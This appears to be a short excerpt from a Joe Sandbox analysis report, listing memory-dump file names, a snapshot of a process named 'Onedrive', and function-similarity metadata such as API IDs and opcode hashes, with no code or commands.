                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                                    • Instruction ID: 1e433069d0e2ef8a44c0c4bcd9ce898d6824c9c3f011ce44fb6603f5662b5159
                                                    • Opcode Fuzzy Hash: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                                    • Instruction Fuzzy Hash: 79012C32A04A82C6EB049B62E1583B9ABE0FF7DB89F4DC075DB0A86345DF38D0599310